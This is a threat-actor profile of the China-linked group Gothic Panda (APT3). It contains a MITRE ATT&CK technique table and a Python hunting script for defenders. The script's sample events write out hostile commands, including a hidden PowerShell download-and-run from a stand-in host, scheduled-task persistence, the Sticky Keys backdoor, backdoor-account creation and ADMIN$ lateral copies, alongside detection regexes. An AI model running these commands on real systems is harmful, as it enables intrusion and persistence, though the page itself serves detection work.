
Threat Actor Characterization

Gothic Panda

ID: 2b7485179e18c60ca83d336bb97f5dba31027
Tags: Cybercrime, State-Sponsored
Threat types: Intrusion, Malware, Espionage
Country: China
Updated: 2026-01-13
Created: 2025-10-20
Aliases: APT3, Buckeye, P****, TG*****, Th***************, UP****** (four of the six aliases are masked in the source preview)
MITRE ATT&CK®

Gothic Panda is a China-based threat group that researchers have attributed to China's Ministry of State Security. This group is responsible for the campaigns known as Operation Clandestine Fox, Operation Clandestine Wolf, and Operation Double Tap. As of June 2015, the group appears to have shifted from targeting primarily US victims to primarily political organizations in Hong Kong. Ref: https://attack.mitre.org/groups/G0022/
Technique  Technique name  Tactics  Evidence
(Tactic IDs: TA0001 Initial Access, TA0002 Execution, TA0003 Persistence, TA0004 Privilege Escalation, TA0005 Defense Evasion, TA0006 Credential Access, TA0007 Discovery, TA0008 Lateral Movement, TA0009 Collection, TA0011 Command and Control)
T1003.001  OS Credential Dumping: LSASS Memory  TA0006
  • Gothic Panda has used a tool that dumps credentials by injecting itself into lsass.exe and is triggered with the argument "dig".
T1021.001  Remote Services: Remote Desktop Protocol  TA0008
  • Gothic Panda enables Remote Desktop Protocol on compromised hosts for persistence and has used RDP sessions to browse and copy files.
T1021.002  Remote Services: SMB/Windows Admin Shares  TA0008
  • Gothic Panda copies files to Windows admin shares (such as ADMIN$) during lateral movement.
T1027.002  Obfuscated Files or Information: Software Packing  TA0005
  • Gothic Panda packs its tools.
T1027.005  Obfuscated Files or Information: Indicator Removal from Tools  TA0005
  • Gothic Panda removes indicators of compromise from its tools.
T1036.010  Masquerading: Masquerade Account Name  TA0005
  • Gothic Panda creates or enables accounts such as support_388945a0, the name of a legacy built-in Windows support account.
T1053.005  Scheduled Task/Job: Scheduled Task  TA0002 TA0003 TA0004
  • A Gothic Panda downloader establishes persistence with the scheduled task: schtasks /create /tn "mysc" /tr C:\Users\Public\test.exe /sc ONLOGON /ru "System"
T1056.001  Input Capture: Keylogging  TA0006 TA0009
  • Gothic Panda has used a keylogging tool that writes captured keystrokes to encrypted files.
T1059.001  Command and Scripting Interpreter: PowerShell  TA0002
  • Gothic Panda has used PowerShell on victim systems to download and run payloads after exploitation.
T1059.003  Command and Scripting Interpreter: Windows Command Shell  TA0002
  • A Gothic Panda downloader runs "cmd.exe" /C whoami. The group also uses a tool that executes commands on remote computers.
T1070.004  Indicator Removal: File Deletion  TA0005
  • Gothic Panda has a tool that deletes files.
T1074.001  Data Staged: Local Data Staging  TA0009
  • Gothic Panda stages files for exfiltration in a single location.
T1078.002  Valid Accounts: Domain Accounts  TA0001 TA0003 TA0004 TA0005
  • After obtaining credentials, Gothic Panda uses valid domain accounts within the victim domain.
T1087.001  Account Discovery: Local Account  TA0007
  • Gothic Panda has used a tool that enumerates local and global group members, power users, and administrators.
T1090.002  Proxy: External Proxy  TA0011
  • A Gothic Panda downloader establishes SOCKS5 connections for its initial C2.
T1098.007  Account Manipulation: Additional Local or Domain Groups  TA0003 TA0004
  • Gothic Panda adds the accounts it creates to local administrator groups to maintain elevated access.
T1110.002  Brute Force: Password Cracking  TA0006
  • Gothic Panda brute-forces captured password hashes to recover plaintext credentials.
T1136.001  Create Account: Local Account  TA0003
  • Gothic Panda has created or enabled local accounts such as support_388945a0.
T1204.001  User Execution: Malicious Link  TA0002
  • Gothic Panda has lured victims into clicking malicious links delivered by spearphishing.
T1218.011  System Binary Proxy Execution: Rundll32  TA0005
  • Gothic Panda has a tool that runs DLLs through rundll32.
T1543.003  Create or Modify System Process: Windows Service  TA0003 TA0004
  • Gothic Panda has a tool that creates a new service for persistence.
T1546.008  Event Triggered Execution: Accessibility Features  TA0003 TA0004
  • Gothic Panda replaces the Sticky Keys binary C:\Windows\System32\sethc.exe for persistence.
T1547.001  Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder  TA0003 TA0004
  • Gothic Panda places scripts in the Startup folder for persistence.
T1552.001  Unsecured Credentials: Credentials In Files  TA0006
  • Gothic Panda has a tool that locates credentials stored in files on the file system, such as those of Firefox or Chrome.
T1555.003  Credentials from Password Stores: Credentials from Web Browsers  TA0006
  • Gothic Panda has used tools to dump passwords from web browsers.
T1560.001  Archive Collected Data: Archive via Utility  TA0009
  • Gothic Panda has used utilities to compress data before exfiltrating it.
T1564.003  Hide Artifacts: Hidden Window  TA0005
  • Gothic Panda has used -WindowStyle Hidden to conceal PowerShell windows.
T1566.002  Phishing: Spearphishing Link  TA0001
  • Gothic Panda has sent spearphishing emails containing malicious links.
T1574.001  Hijack Execution Flow: DLL  TA0003 TA0004 TA0005
  • Gothic Panda has side-loaded a malicious DLL with a legitimate Chrome executable shipped as part of one of its tools.
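Most of the behaviours in the table leave a command line in process-creation telemetry, so they can be hunted directly. The Python below is an added example for this page, not code from the original page, from MITRE or from any vendor: it encodes the concrete behaviours above (the ONLOGON task from C:\Users\Public, the sethc.exe swap, the support_388945a0 account and its admin-group add, RDP enablement, the hidden PowerShell download, the ADMIN$ copy and the "cmd.exe" /C whoami recon) as rules and runs them over constructed events. The event field names mirror Sysmon Event ID 1 / Security 4688 fields but are an assumption, as are the parent-process allow-list, the host names and every sample command line.

```python
"""Hunting rules for the command-line behaviours in the ATT&CK table above,
run over constructed Windows process-creation events.

Added example for this page, not vendor or platform code. The event fields
mirror Sysmon Event ID 1 / Security 4688, but the names, the parent
allow-list and every sample event below are constructed (assumptions)."""

import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    host: str
    image: str          # path of the created process
    parent_image: str   # path of its parent
    command_line: str


@dataclass(frozen=True)
class Hit:
    technique: str
    reason: str
    event: ProcEvent


def _norm(e):
    """Lower-case the command line and collapse runs of whitespace."""
    return re.sub(r"\s+", " ", e.command_line).lower().strip()


def _base(path):
    return path.rsplit("\\", 1)[-1].lower()


def _hit(pattern, text):
    return re.search(pattern, text) is not None


# Parents from which "cmd.exe /C whoami" is usually an operator, not a dropper (assumed list).
SHELL_PARENTS = {"explorer.exe", "cmd.exe", "powershell.exe", "pwsh.exe", "windowsterminal.exe"}

# (technique, reason, predicate over a ProcEvent). Each predicate pairs the indicator
# with the context that separates it from routine admin activity.
RULES = [
    ("T1053.005", "ONLOGON scheduled task run as SYSTEM from a user-writable path",
     lambda e: "schtasks" in _norm(e) and "/create" in _norm(e)
               and _hit(r'/ru "?(system|nt authority\\system)"?', _norm(e))
               and _hit(r'/tr "?[a-z]:\\(users\\public|windows\\temp|programdata)\\', _norm(e))),
    ("T1546.008", "sethc.exe overwritten or re-ACLed",
     lambda e: "sethc.exe" in _norm(e) and _hit(r"\b(copy|xcopy|move|ren|takeown|icacls)\b", _norm(e))),
    ("T1136.001", "support_388945a0 created or re-enabled",
     lambda e: _hit(r'net1?(\.exe)?"? user support_388945a0\b.*(/add|/active:yes)', _norm(e))),
    ("T1098.007", "account added to local Administrators",
     lambda e: _hit(r'net1?(\.exe)?"? localgroup "?administrators"? \S+ /add', _norm(e))),
    ("T1021.001", "RDP enabled via fDenyTSConnections=0",
     lambda e: "fdenytsconnections" in _norm(e) and _hit(r"/d 0\b", _norm(e))),
    ("T1564.003", "hidden PowerShell window fetching a payload (also T1059.001)",
     lambda e: "powershell" in _norm(e) and _hit(r"-w[a-z]* hidden", _norm(e))
               and _hit(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient", _norm(e))),
    ("T1021.002", "file copied to a remote ADMIN$ share",
     lambda e: _hit(r"\b(copy|xcopy|move|robocopy)\b.*\\\\[^\\]+\\admin\$", _norm(e))),
    ("T1059.003", '"cmd.exe" /C whoami spawned by a non-shell parent',
     lambda e: _base(e.image) == "cmd.exe" and _hit(r"/c whoami\b", _norm(e))
               and _base(e.parent_image) not in SHELL_PARENTS),
]


def hunt(events):
    """Run every rule over every event; return the hits in event order."""
    return [Hit(tid, why, e) for e in events for tid, why, pred in RULES if pred(e)]


def techniques_by_host(events):
    """host -> sorted distinct technique IDs, a compact triage view."""
    seen = {}
    for h in hunt(events):
        seen.setdefault(h.event.host, set()).add(h.technique)
    return {host: sorted(t) for host, t in seen.items()}


# Constructed sample telemetry: one host showing the chain from the table, one benign host.
P = r"C:\Users\Public\test.exe"
S32 = r"C:\Windows\System32"
SAMPLE_EVENTS = [
    ProcEvent("ws-0412", S32 + r"\cmd.exe", P, r'"cmd.exe" /C whoami'),
    ProcEvent("ws-0412", S32 + r"\schtasks.exe", P, r'schtasks /create /tn "mysc" /tr C:\Users\Public\test.exe /sc ONLOGON /ru "System"'),
    ProcEvent("ws-0412", S32 + r"\WindowsPowerShell\v1.0\powershell.exe", P,
              "powershell.exe -WindowStyle Hidden -NoProfile -Command \"IEX (New-Object Net.WebClient).DownloadString('http://stage.example/p.ps1')\""),
    ProcEvent("ws-0412", S32 + r"\net.exe", S32 + r"\cmd.exe", "net user support_388945a0 /active:yes"),
    ProcEvent("ws-0412", S32 + r"\net.exe", S32 + r"\cmd.exe", "net localgroup administrators support_388945a0 /add"),
    ProcEvent("ws-0412", S32 + r"\reg.exe", S32 + r"\cmd.exe",
              r'reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f'),
    ProcEvent("ws-0412", S32 + r"\cmd.exe", P, r"cmd.exe /c copy /y C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe"),
    ProcEvent("ws-0412", S32 + r"\cmd.exe", P, r"cmd.exe /c copy C:\Users\Public\test.exe \\fs01\ADMIN$\test.exe"),
    # Benign look-alikes that must not fire.
    ProcEvent("ws-benign", S32 + r"\whoami.exe", S32 + r"\cmd.exe", "whoami"),
    ProcEvent("ws-benign", S32 + r"\schtasks.exe", S32 + r"\cmd.exe",
              r'schtasks /create /tn "Inventory" /tr "C:\Program Files\Inv\inv.exe" /sc DAILY /ru "System"'),
    ProcEvent("ws-benign", S32 + r"\WindowsPowerShell\v1.0\powershell.exe", S32 + r"\cmd.exe",
              r"powershell.exe -WindowStyle Hidden -File C:\Scripts\inventory.ps1"),
    ProcEvent("ws-benign", S32 + r"\reg.exe", S32 + r"\cmd.exe",
              r'reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f'),
]

if __name__ == "__main__":
    for h in hunt(SAMPLE_EVENTS):
        print(f"{h.event.host}  {h.technique}  {h.reason}: {h.event.command_line}")
```

The benign events show why each rule ties the indicator to context rather than matching a single token: a SYSTEM task is routine until its /tr path is user-writable, a hidden PowerShell window is routine until it also downloads, and fDenyTSConnections is only interesting when set to 0. Run against real Sysmon or 4688 data the same predicates apply once the fields are mapped, but the parent allow-list and the writable-path list will need tuning per environment.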